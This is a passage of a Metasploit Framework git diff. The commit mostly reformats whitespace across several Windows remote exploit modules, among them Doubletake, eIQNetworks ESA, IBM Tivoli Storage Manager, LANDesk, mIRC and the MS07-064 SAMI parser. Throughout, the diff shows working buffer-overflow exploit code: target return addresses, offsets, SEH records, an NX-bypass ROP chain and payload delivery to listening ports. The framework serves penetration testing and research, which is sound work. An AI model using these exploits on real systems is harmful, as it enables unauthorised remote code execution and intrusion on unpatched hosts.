overflow in the authentication mechanism of + This module exploits a stack overflow in the authentication mechanism of NSI Doubletake which is also rebranded as HP Storage Works. This vulnerability was found by Titon of Bastard Labs. }, 'Author' => [ 'ri0t <ri0t[at]ri0tnet.net>' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ - ['CVE', '2008-1661'], - ['OSVDB', '45924'], + ['CVE', '2008-1661' ], + ['OSVDB', '45924' ], ], 'DefaultOptions' => { @@ -42,11 +42,11 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00", }, 'Platform' => 'win', - + 'Targets' => [ ['doubletake 4.5.0', { 'Ret' => 0x006f5fa7, 'Offset' => 5544 } ], - ['doubletake 4.4.2', { 'Ret' => 0x0074e307, 'Offset' => 944 } ], + ['doubletake 4.4.2', { 'Ret' => 0x0074e307, 'Offset' => 944 } ], ['doubletake 4.5.0.1819', { 'Ret' => 0x006e62dd, 'Offset' => 5544 } ], ], 'DefaultTarget' => 0, @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => false )) - register_options( + register_options( [ Opt::RPORT(1100) ], self.class) @@ -66,11 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying target #{target.name}...") - header = - "\x00\x02\x00\x01\x27\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x00"+ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"+ - "\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x01" + header = + "\x00\x02\x00\x01\x27\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x00"+ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"+ + "\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x01" xor = Rex::Encoding::Xor::Byte filler = rand_text_english(1) * (target['Offset']) @@ -78,9 +78,9 @@ class Metasploit3 < Msf::Exploit::Remote buffercoded = xor.encode(seh+payload.encoded, [0xf0].pack("C")) sploit = header + filler + buffercoded[0] sock.put(sploit) - + handler - disconnect + disconnect end end diff --git a/modules/exploits/windows/misc/eiqnetworks_esa.rb b/modules/exploits/windows/misc/eiqnetworks_esa.rb index a25e5bd813..58fbf911a3 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow', 'Description' => %q{ - This module exploits a stack overflow in eIQnetworks + This module exploits a stack overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the LICMGR_ADDLICENSE command, a stack-based buffer overflow occurs. This module has only been tested @@ -30,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'ri0t <ri0t[at]ri0tnet.net>', 'kf' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ ['CVE', '2006-3838'], ['OSVDB', '27526'], @@ -48,11 +46,10 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', - 'Targets' => [ - ['EnterpriseSecurityAnalyzerv21 Universal', { 'Ret' => 0x00448187, 'Offset' => 494 } ], - + ['EnterpriseSecurityAnalyzerv21 Universal', { 'Ret' => 0x00448187, 'Offset' => 494 } ], + ['EiQ Enterprise Security Analyzer Offset 494 Windows 2000 SP0-SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 494 } ], # call ebx ['EiQ Enterprise Security Analyzer Offset 494 Windows XP English SP1/SP2', { 'Ret' => 0x77db64dc, 'Offset' => 494 } ], # jmp ebx ['EiQ Enterprise Security Analyzer Offset 494 Windows Server 2003 SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 494 } ], # jmp EBX @@ -73,16 +70,13 @@ class Metasploit3 < Msf::Exploit::Remote ['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 1262 } ], ['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 1262 } ], ['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows XP English SP1/SP2', { 'Ret' => 0x77db64dc, 'Offset' => 1262 } ], - ['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 1262 } ], + ['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 1262 } ], ], - 'Privileged' => false, - 'DisclosureDate' => 'July 24 2006' - )) - register_options( + register_options( [ Opt::RPORT(10616) ], self.class) @@ -99,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(sploit) handler - disconnect + disconnect end end diff --git a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb index 9ef668eb9f..6a36d3a26c 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,18 +20,17 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'eIQNetworks ESA Topology DELETEDEVICE Overflow', 'Description' => %q{ - This module exploits a stack overflow in eIQnetworks + This module exploits a stack overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the DELETEDEVICE command in the Topology server, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13. - }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2006-3838'], ['OSVDB', '27528'], ['BID', '19164'], @@ -49,21 +46,17 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', - 'Targets' => [ [ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ], [ 'Windows XP SP2 English', { 'Ret' => 0x77d57447 } ], - [ 'Windows 2003 SP1 English', { 'Ret' => 0x773b24da } ], + [ 'Windows 2003 SP1 English', { 'Ret' => 0x773b24da } ], ], - 'Privileged' => false, - 'DisclosureDate' => 'July 25 2006' - )) - register_options( + register_options( [ Opt::RPORT(10628) ], self.class) @@ -76,12 +69,12 @@ class Metasploit3 < Msf::Exploit::Remote filler = rand_text_alphanumeric(128) + [target.ret].pack('V') + make_nops(20) - sploit = "DELETEDEVICE&" + filler + payload.encoded + sploit = "DELETEDEVICE&" + filler + payload.encoded sock.put(sploit) handler - disconnect + disconnect end end diff --git a/modules/exploits/windows/misc/eureka_mail_err.rb b/modules/exploits/windows/misc/eureka_mail_err.rb index 01448b2f57..2981a132b8 100644 --- a/modules/exploits/windows/misc/eureka_mail_err.rb +++ b/modules/exploits/windows/misc/eureka_mail_err.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,8 +23,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow in the Eureka Email 2.2q client that is triggered through an excessively long ERR message. - - NOTE: this exploit isn't very reliable. Unfortunately reaching the + + NOTE: this exploit isn't very reliable. Unfortunately reaching the vulnerable code can only be done when manually checking mail (Ctrl-M). Checking at startup will not reach the code targeted here. }, @@ -52,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => true, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Win XP SP3 English', { 'Ret' => 0x7E429353 } ], # jmp esp / user32.dll [ 'Win XP SP2 English', { 'Ret' => 0x77D8AF0A } ], # jmp esp / user32.dll @@ -61,32 +65,32 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The POP3 daemon port to listen on", 110 ]), ], self.class) end def on_client_connect(client) return if ((p = regenerate_payload(client)) == nil) - + # the offset to eip depends on the local ip address string length... already = "Your POP3 server had a problem.\n" already << datastore['LHOST'] already << " said:\n\n -ERR " space = (512+256+4) - already.length - + buffer = "-ERR " buffer << make_nops(space - payload.encoded.length) buffer << payload.encoded buffer << [target.ret].pack('V') buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-0x2c0").encode_string buffer << "\r\n" - + print_status("Sending exploit to #{client.peerhost}:#{client.peerport}...") client.put(buffer) - - handler + + handler service.close_client(client) end - + end diff --git a/modules/exploits/windows/misc/fb_isc_attach_database.rb b/modules/exploits/windows/misc/fb_isc_attach_database.rb index 67e87df246..33a8a7aee9 100644 --- a/modules/exploits/windows/misc/fb_isc_attach_database.rb +++ b/modules/exploits/windows/misc/fb_isc_attach_database.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -23,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Firebird Relational Database isc_attach_database() Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Borland InterBase + This module exploits a stack overflow in Borland InterBase by sending a specially crafted create request. }, 'Version' => '$Revision$', @@ -36,11 +34,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'References' => [ - [ 'CVE', '2007-5243' ], - [ 'OSVDB', '38607' ], - [ 'BID', '25917' ], - [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], - ], + [ 'CVE', '2007-5243' ], + [ 'OSVDB', '38607' ], + [ 'BID', '25917' ], + [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], + ], 'Privileged' => true, 'License' => MSF_LICENSE, 'Payload' => @@ -69,14 +67,9 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(3050) - ], - self.class - ) - + ], self.class) end - - # Create database parameter block def dpb_create isc_dpb_user_name = 28 diff --git a/modules/exploits/windows/misc/fb_isc_create_database.rb b/modules/exploits/windows/misc/fb_isc_create_database.rb index befbd8a4d4..cea9388c52 100644 --- a/modules/exploits/windows/misc/fb_isc_create_database.rb +++ b/modules/exploits/windows/misc/fb_isc_create_database.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -23,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Firebird Relational Database isc_create_database() Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Borland InterBase + This module exploits a stack overflow in Borland InterBase by sending a specially crafted create request. }, 'Version' => '$Revision$', @@ -36,11 +34,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'References' => [ - [ 'CVE', '2007-5243' ], - [ 'OSVDB', '38606' ], - [ 'BID', '25917' ], - [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], - ], + [ 'CVE', '2007-5243' ], + [ 'OSVDB', '38606' ], + [ 'BID', '25917' ], + [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], + ], 'Privileged' => true, 'License' => MSF_LICENSE, 'Payload' => @@ -69,14 +67,9 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(3050) - ], - self.class - ) - + ], self.class) end - - # Create database parameter block def dpb_create isc_dpb_user_name = 28 diff --git a/modules/exploits/windows/misc/fb_svc_attach.rb b/modules/exploits/windows/misc/fb_svc_attach.rb index 2a687f3b6a..bcfcb6d983 100644 --- a/modules/exploits/windows/misc/fb_svc_attach.rb +++ b/modules/exploits/windows/misc/fb_svc_attach.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -36,11 +34,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'References' => [ - [ 'CVE', '2007-5243' ], - [ 'OSVDB', '38605' ], - [ 'BID', '25917' ], - [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], - ], + [ 'CVE', '2007-5243' ], + [ 'OSVDB', '38605' ], + [ 'BID', '25917' ], + [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], + ], 'Privileged' => true, 'License' => MSF_LICENSE, 'Payload' => @@ -69,10 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(3050) - ], - self.class - ) - + ], self.class) end def exploit_target(target) diff --git a/modules/exploits/windows/misc/hp_ovtrace.rb b/modules/exploits/windows/misc/hp_ovtrace.rb index 013f0281ce..64288381b4 100644 --- a/modules/exploits/windows/misc/hp_ovtrace.rb +++ b/modules/exploits/windows/misc/hp_ovtrace.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -23,12 +21,12 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'HP OpenView Operations OVTrace Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in HP OpenView Operations version A.07.50. - By sending a specially crafted packet, a remote attacker may be able to execute arbitrary code. + By sending a specially crafted packet, a remote attacker may be able to execute arbitrary code. }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2007-3872' ], [ 'OSVDB', '39527' ], [ 'BID', '25255' ], @@ -46,20 +44,19 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows 2000 Advanced Server All English', { 'Ret' => 0x75022ac4 } ], + [ 'Windows 2000 Advanced Server All English', { 'Ret' => 0x75022ac4 } ], ], 'Privileged' => true, 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 9 2007')) - register_options([Opt::RPORT(5051)], self.class) - + register_options([Opt::RPORT(5051)], self.class) end def exploit connect - sploit = "\x0f\x00\x00\x06\x00" + rand_text_english(62) + sploit = "\x0f\x00\x00\x06\x00" + rand_text_english(62) sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2) sploit << [target.ret].pack('V') + payload.encoded sploit << rand_text_english(2024) diff --git a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb index 7a497ff174..71ab00fdb6 100644 --- a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb +++ b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking @@ -20,14 +18,14 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'IBM Tivoli Storage Manager Express CAD Service Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in the IBM Tivoli Storage Manager Express CAD Service. + This module exploits a stack overflow in the IBM Tivoli Storage Manager Express CAD Service. By sending a "ping" packet containing a long string, an attacker can execute arbitrary code. - - NOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order - for the vulnerable code to be reached. This state doesn't appear to be reachable when the + + NOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order + for the vulnerable code to be reached. This state doesn't appear to be reachable when the TSM server is not running. This service does not restart. }, 'Author' => [ 'jduck' ], @@ -50,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # this target should be pretty universal.. # dbghelp.dll is shipped with TSM Express, and hasn't been kept up-to-date.. @@ -58,38 +56,37 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 04 2009')) - - register_options( [ Opt::RPORT(1582) ], self.class ) + register_options( [ Opt::RPORT(1582) ], self.class ) end def exploit - + print_status("Trying target %s..." % target.name) - + # wchar_t buf[64]; - + #print_status("Generating sploit data...") distance = payload_space + 8 backjmp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string copy_len = distance + backjmp.length + (1024*3) - + sploit = [0,copy_len].pack('n*') sploit << payload.encoded sploit << generate_seh_record(target.ret) sploit << backjmp # force hitting end of the stack sploit << rand_text(1024) * 3 - + data = [sploit.length,0x26,0xa5].pack('nCC') data << sploit - + got_it = false while not got_it connect print_status("Sending nasty ping request...") sock.put(data) - + begin buf = sock.get_once(-1, 5) rescue @@ -100,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote end got_it = true end - + print_status("Starting handler...") handler disconnect diff --git a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb index 8eb30eabde..b75b458553 100644 --- a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb +++ b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb @@ -3,30 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'IBM Tivoli Storage Manager Express RCA Service Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in the IBM Tivoli Storage Manager Express Remote - Client Agent service. By sending a "dicuGetIdentify" request packet containing a long + This module exploits a stack overflow in the IBM Tivoli Storage Manager Express Remote + Client Agent service. By sending a "dicuGetIdentify" request packet containing a long NodeName parameter, an attacker can execute arbitrary code. - - NOTE: this exploit first connects to the CAD service to start the RCA service and obtain + + NOTE: this exploit first connects to the CAD service to start the RCA service and obtain the port number on which it runs. This service does not restart. }, 'Author' => [ 'jduck' ], @@ -51,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # this target should be pretty universal.. # dbghelp.dll is shipped with TSM Express, and hasn't been kept up-to-date.. @@ -59,12 +57,11 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 04 2009')) - - register_options( [ Opt::RPORT(1582) ], self.class ) + register_options( [ Opt::RPORT(1582) ], self.class ) end - - + + def make_tsm_packet(op,data) pkt = "" if op > 0xff @@ -74,8 +71,8 @@ class Metasploit3 < Msf::Exploit::Remote end pkt << data end - - + + def explode_tsm_packet(buf) return nil if buf.length < 4 len,op,magic = buf[0,4].unpack('nCC') @@ -87,11 +84,11 @@ class Metasploit3 < Msf::Exploit::Remote else data = buf[4,len] end - + return op,data end - - + + def extract_port(buf) op,data = explode_tsm_packet(buf) if op != 0x10300 @@ -109,12 +106,12 @@ class Metasploit3 < Msf::Exploit::Remote end rca_port = data[24,port_str_len].unpack('n*').pack('C*').to_i end - - + + def exploit - + print_status("Trying target %s..." % target.name) - + # first get the port number query = [1].pack('n') query << "\x00" * 10 @@ -125,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(data) buf = sock.get_once(-1, 10) disconnect - + rca_port = extract_port(buf) if not rca_port or rca_port == 0 print_error("The RCA agent service was not started :(") @@ -133,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("RCA Agent is now running on port %u" % rca_port) end - + # trigger the vulnerability copy_len = payload_space + 4 sploit = rand_text(33) @@ -146,11 +143,11 @@ class Metasploit3 < Msf::Exploit::Remote # adjustment :) sploit << buf data = make_tsm_packet(0x10400, sploit) - + connect(true, { 'RPORT' => rca_port }) print_status("Sending specially crafted dicuGetIdentifyRequest packet...") sock.write(data) - + print_status("Starting handler...") handler disconnect diff --git a/modules/exploits/windows/misc/landesk_aolnsrvr.rb b/modules/exploits/windows/misc/landesk_aolnsrvr.rb index ec608c3aec..050bdd2e0e 100644 --- a/modules/exploits/windows/misc/landesk_aolnsrvr.rb +++ b/modules/exploits/windows/misc/landesk_aolnsrvr.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -28,8 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2007-1674'], ['OSVDB', '34964'], ['URL', 'http://www.tippingpoint.com/security/advisories/TSRT-07-04.html'], @@ -41,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'Space' => 336, - 'StackAdjustment' => -3500, + 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => @@ -55,8 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 13 2007')) - register_options([Opt::RPORT(65535)], self.class) - + register_options([Opt::RPORT(65535)], self.class) end def exploit @@ -100,10 +97,10 @@ class Metasploit3 < Msf::Exploit::Remote # mov [esi+0Ch], eax # pop esi # retn - + txt[ 312, 4] = [ib + 0x106b1].pack('V') - - + + # finally we call NtSetInformationProcess (-1, target['ProcessInfo'], ib+0x4ec84, 4) # 0x0044ec84 is a pointer to 0x2 to disable NX # 0x0042a28e: @@ -130,13 +127,13 @@ class Metasploit3 < Msf::Exploit::Remote # One-shot overwrite =( txt = rand_text_alphanumeric(280) + [target.ret].pack('V') + payload.encoded end - + print_status("Trying target #{target.name}...") - + udp_sock.put(txt) - + handler(udp_sock) - disconnect_udp + disconnect_udp end end diff --git a/modules/exploits/windows/misc/mercury_phonebook.rb b/modules/exploits/windows/misc/mercury_phonebook.rb index d5d1c32e3e..9e2fcd120a 100644 --- a/modules/exploits/windows/misc/mercury_phonebook.rb +++ b/modules/exploits/windows/misc/mercury_phonebook.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Mercury/32 <= v4.01b PH Server Module Buffer Overflow', 'Description' => %q{ - This module exploits a stack-based buffer overflow in + This module exploits a stack-based buffer overflow in Mercury/32 <= v4.01b PH Server Module. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer. @@ -30,8 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2005-4411' ], [ 'OSVDB', '22103'], [ 'BID', '16396' ], @@ -47,21 +45,16 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => [ [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], [ 'Windows 2000 Pro English ALL', { 'Ret' => 0x75022ac4 } ], ], - 'Privileged' => true, - 'DisclosureDate' => 'December 19 2005', - 'DefaultTarget' => 0)) - register_options([ Opt::RPORT(105)], self) - + register_options([ Opt::RPORT(105)], self) end def exploit @@ -74,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << [target.ret].pack('V') + [0xe8, -450].pack('CV') + "\r\n" sock.put(sploit) - + handler disconnect end diff --git a/modules/exploits/windows/misc/mirc_privmsg_server.rb b/modules/exploits/windows/misc/mirc_privmsg_server.rb index 1175437f64..ad87a85d25 100644 --- a/modules/exploits/windows/misc/mirc_privmsg_server.rb +++ b/modules/exploits/windows/misc/mirc_privmsg_server.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -21,16 +19,16 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'mIRC <= 6.34 PRIVMSG Handling Stack Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier. - By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG + This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier. + By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads may be necessary. This module is based on the code by SkD. }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2008-4449' ], [ 'OSVDB', '48752' ], [ 'BID', '31552' ], @@ -68,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return if ((p = regenerate_payload(client)) == nil) print_status("Client connected! Sending payload...") buffer = ":my_irc_server.com 001 wow :Welcome to the #{datastore['SRVNAME']} wow\r\n" client.put(buffer) @@ -79,10 +77,10 @@ class Metasploit3 < Msf::Exploit::Remote sleep(2) sploit = ":" + Rex::Text.rand_text_alphanumeric(307) + [target['Rets'][0]].pack('V') + [target['Rets'][1]].pack('V') sploit << make_nops(4) + [target['Rets'][2]].pack('V') + make_nops(4) + "B" * 12 - sploit << Rex::Arch::X86.jmp_short(3) +Rex::Text.rand_text_alphanumeric(2) + sploit << Rex::Arch::X86.jmp_short(3) +Rex::Text.rand_text_alphanumeric(2) sploit << make_nops(4) + payload.encoded + make_nops(4) + " PRIVMSG wow : /FINGER wow\r\n" client.put(sploit) - + handler(client) service.close_client(client) end diff --git a/modules/exploits/windows/misc/ms07_064_sami.rb b/modules/exploits/windows/misc/ms07_064_sami.rb index de913f74a6..77751f2ea0 100644 --- a/modules/exploits/windows/misc/ms07_064_sami.rb +++ b/modules/exploits/windows/misc/ms07_064_sami.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -22,18 +20,18 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack overflow in the DirectShow Synchronized Accessible Media Interchanged (SAMI) parser in quartz.dll. This module - has only been tested with Windows Media Player (6.4.09.1129) and + has only been tested with Windows Media Player (6.4.09.1129) and DirectX 8.0. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-3901' ], [ 'OSVDB', '39126' ], [ 'MSB', 'MS07-064' ], - [ 'BID', '26787' ], + [ 'BID', '26787' ], ], 'DefaultOptions' => { @@ -48,27 +46,27 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows 2000 Pro SP4 English', { 'Offset' => 22412, 'Ret' => 0x75022ac4 } ], + [ 'Windows 2000 Pro SP4 English', { 'Offset' => 22412, 'Ret' => 0x75022ac4 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Dec 11 2007', 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 8080 ]) ], self.class) end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return if ((p = regenerate_payload(client)) == nil) client.get_once - buffer = make_nops(target['Offset'] - payload.encoded.length) + payload.encoded - buffer << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V') + buffer = make_nops(target['Offset'] - payload.encoded.length) + payload.encoded + buffer << Rex::Arch::X86.jmp_short(6) + make_nops(2) + 